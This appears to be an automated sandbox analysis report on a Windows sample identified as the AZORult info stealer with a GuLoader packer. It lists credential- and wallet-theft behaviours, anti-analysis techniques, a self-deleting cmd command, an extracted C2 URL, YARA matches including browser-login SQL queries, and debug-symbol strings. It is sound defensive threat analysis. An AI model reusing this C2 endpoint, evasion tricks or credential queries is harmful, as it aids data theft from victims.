Loading ...

Play interactive tourEdit tour

Windows Analysis Report 1COK25f1vT.exe

Overview

General Information

Sample Name:1COK25f1vT.exe
Analysis ID:542372
MD5:5918b91ac2931af0267e4af06f3fd2e2
SHA1:1ce7cccf52a0a569d013c0a91efb4f808c3c6194
SHA256:41acb7b14d4167374da9039e1324caac71b397bf246abb50cb9ae1ca197b3cc1
Tags:AZORultexe
Infos:

Most interesting Screenshot:

Detection

AZORult GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected AZORult Info Stealer
Yara detected Azorult Info Stealer
Detected unpacking (changes PE section rights)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Tries to harvest and steal Bitcoin Wallet information
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 1COK25f1vT.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\1COK25f1vT.exe" MD5: 5918B91AC2931AF0267E4AF06F3FD2E2)
    • 1COK25f1vT.exe (PID: 2132 cmdline: "C:\Users\user\Desktop\1COK25f1vT.exe" MD5: 5918B91AC2931AF0267E4AF06F3FD2E2)
      • cmd.exe (PID: 1360 cmdline: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6828 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Azorult

{"C2 url": "http://185.29.11.112/rothchildnew/Panel/index.php"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.385834969.000000001FC24000.00000040.00020000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
      0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        0000000C.00000002.515598674.000000002030C000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
          00000000.00000002.383092369.0000000002A90000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.1COK25f1vT.exe.400000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
              12.2.1COK25f1vT.exe.400000.0.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                12.2.1COK25f1vT.exe.400000.0.unpackAzorult_1Azorult Payloadkevoreilly
                • 0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
                • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
                12.2.1COK25f1vT.exe.2004391e.5.raw.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                  12.2.1COK25f1vT.exe.2004391e.5.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
                  • 0x2988e9:$string1: SELECT origin_url, username_value, password_value FROM logins
                  • 0x2994d6:$string1: SELECT origin_url, username_value, password_value FROM logins
                  • 0x109a34:$string2: API call with %s database connection pointer
                  • 0x10a668:$string3: os_win.c:%d: (%lu) %s(%s) - %s
                  Click to see the 4 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 12.2.1COK25f1vT.exe.400000.0.unpackMalware Configuration Extractor: Azorult {"C2 url": "http://185.29.11.112/rothchildnew/Panel/index.php"}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: 1COK25f1vT.exeVirustotal: Detection: 40%Perma Link
                  Source: 1COK25f1vT.exeReversingLabs: Detection: 71%
                  Source: 0.2.1COK25f1vT.exe.1fb10000.1.unpackAvira: Label: TR/Dropper.Gen
                  Source: C:\Users\user\Desktop\1COK25f1vT.exeCode function: 12_2_0040A610 CryptUnprotectData,LocalFree,12_2_0040A610
                  Source: 1COK25f1vT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49786 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49787 version: TLS 1.2
                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482084797.000000001F99C000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, mozglue.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr
                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.12.dr
                  Source: Binary string: ucrtbase.pdb source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, ucrtbase.dll.12.dr
                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, freebl3.dll.12.dr
                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.463561095.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.476648214.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.476666229.000000001F9A0000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491797103.00000000203A8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.468064054.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.12.dr
                  Source: Binary string: vcruntime140.i386.pdbGCTL source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, vcruntime140.dll.12.dr
                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491619490.000000002035C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, mozglue.dll.12.dr
                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, freebl3.dll.12.dr
                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.481305544.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.465766679.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.478268008.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.478663759.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr
                  Source: Binary string: msvcp140.i386.pdb source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492268054.000000001F688000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, msvcp140.dll.12.dr
                  Source: Binary string: ucrtbase.pdbUGP source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, ucrtbase.dll.12.dr
                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.12.dr
